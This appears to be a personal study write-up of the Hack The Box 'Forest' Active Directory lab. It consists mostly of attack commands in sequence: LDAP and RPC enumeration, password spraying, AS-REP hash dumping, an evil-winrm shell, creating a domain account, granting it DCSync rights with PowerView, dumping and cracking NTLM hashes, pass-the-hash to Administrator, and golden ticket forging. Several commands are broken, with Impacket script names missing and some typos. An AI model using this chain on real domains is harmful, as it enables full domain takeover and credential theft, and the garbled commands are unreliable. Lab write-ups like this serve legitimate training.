Forest HTB (ippsec) -followthrough

  • try to expose SMB

  • try to expose host names with nslookup


    • the actual ip

  • ldapsearch IP -x -s base namingcontexts (find domain info)

  • ldapsearch IP -x -s -b "DC=htb,DC=local" '(objectClass=Person)' FILTERS(what you want to see)

    • for the filter part you can put whatever like sAMAccountName

    • we can do user instead of the person, too

we can do passwordspray once we get the account names.

awk '{print $2}' to print the second part.

make a user list with the valid users (no need to include guest account that ends with $ -- valid users are generally short)

Let's crack them with password!

password list should be short.

Months,Spring, Summer, Winter, Autmn, Fall, Password, Password123, P@ssw0rd, Secret

for i in $(cat pwlist.txt); do echo $i; echo ${i}2019; echo ${i}2020; done

  • this adds year at the end of each word.

hashcat --force --stdout pwlist.txt -r /usr/share/hashcat/rules/best64.rules

This will mutate the passwords and create a new passwordlist

  • add a ! at the end of each word

  • for i in $(cat pwlist.txt); do echo $i; echo ${i}\!; done

Another technique

  • hashcat --force --stdout pwlist.txt -r /usr/share/hashcat/rules/best64.rules -r /usr/share/hashcat/rules/toggles1.rule | sort -u

    • this capitalize different letters | awk 'length ($0) > 8'

Dump password policy

  • crackmapexec smb IP --pass-pol

  • crackmapesex smb IP --pass-pol -u '' -p '' (null authentication attempt)

  • enum4linux

Manual way to look up password policy

if it's showing something like below, it's doing rpc

do rpcclient -U '' IP

and login:

  • enumdom

  • enumdomusers

  • queryusergroups 0x47b (rid)

  • querygroup grouprid to see what kind of domain it is

  • queryuser rid to see password policies

Crack pass

crackmapexec smb IP -u userlist.out -p pwlist.out


Impacket GetNPUsers -dc-ip IP -request 'htb.local/' -format hashcat

looks for account that doesn't require kerbero authentication and dump the hashes.

and crack the output


crackmapexec smb IP -u svc-alfresco -p s3rvice --shares

shows shares


Use evill-winrm

./evil-winrm.rb -u user -p pass -i IP

---> this should get you to the service level shell


Priv Esc


On Kali:

  • download the zip file and the bloodhound application file separately.

  • After downloading, unzip the application file.

  • Download neo4j

neo4j console -> set a new password (default is neo4j) by visiting the localhost:PORT

  • Now execute the Bloodhound with ./Bloodhound --no-sandbox and logiin

On the victim's machine, upload or use the mounted drive to run the SharpHound.exe

./SharpHound.exe -c all

On kali,

  • drop the bloodhound zip file onto the browser which should start processing

On the search bar, type in the user that you already know and mark it as owned

-> show paths from owned principles -> shows a map

If you see an account operation group, they can create users

On victim's,

net user gori gorigori(pass) /add /domain

this should create an account.

net group "Exchange Windows Permissions" /add gori

net group "Exchange Windows Permissions" will verify that the user has been added.

On bloodhound, click the link "WriteDacl" > Abuseinfo

Add-DomainObjectAcl -Credentials $cred -TargetIdentity testlab.local -Rights DCSync

This is a powerview command .

Download the dev version of the powersploit with the -b dev on git clone

copy the powerview.ps1 over to the victim's machine.

$pass= convertto-securestring 'gorigori' -AsPlainText -Force

$cred = New-Object System.Management.Automation.PSCredential('HTBl\gori', $pass)

Add-DomainObjectAcl -Credentials $cred -TargetIdentity "DC=htb, DC=local" -PrincipalIdentity gori -Rights DCSync

Then on kali,

use impacket's htb/gori:gorigori@IP

grab the last :HASH: part for the admin account

Crack the pass

crackmapexec smb IP -u administrator -H HASH htb.local/Administrator:Pass@

This should get you a root shell.


Another way to crack

NTLM password cracking:

cat hash.out | grep ::: | awk -F: '{print $1":"$4}'

and do

hashcat --user -m 1000 new_hashes.out rockyou.txt -r rules/InsidePro-PasswordsPro.rule
  • --user will recognize the format "user:hash"

  • --show will show users


Golden Ticket method

copy the krbtgt hash.

On the victim's machine, run the following command to get the -domain-sid

Get-ADDomain htb.local

Golden ticket
With Impacket examples:

# To generate the TGT with NTLM
python -nthash <krbtgt_ntlm_hash> -domain-sid <domain_sid> -domain <domain_name>  <user_name>
# To generate the TGT with AES key
python -aesKey <aes_key> -domain-sid <domain_sid> -domain <domain_name>  <user_name>

# Set the ticket for impacket use
export KRB5CCNAME=<TGS_ccache_file>

# Execute remote commands with any of the following by using the TGT
python <domain_name>/<user_name>@<remote_hostname> -k -no-pass
python <domain_name>/<user_name>@<remote_hostname> -k -no-pass
python <domain_name>/<user_name>@<remote_hostname> -k -no-pass

#username can be anything.

  • ipaddress address should not be used for the remote_hostname. Always add the host name to the hosts file.

if it says the time is wrong, we have to change our time --- nmap shows clockstew.

date -s TIME

to change time

Last updated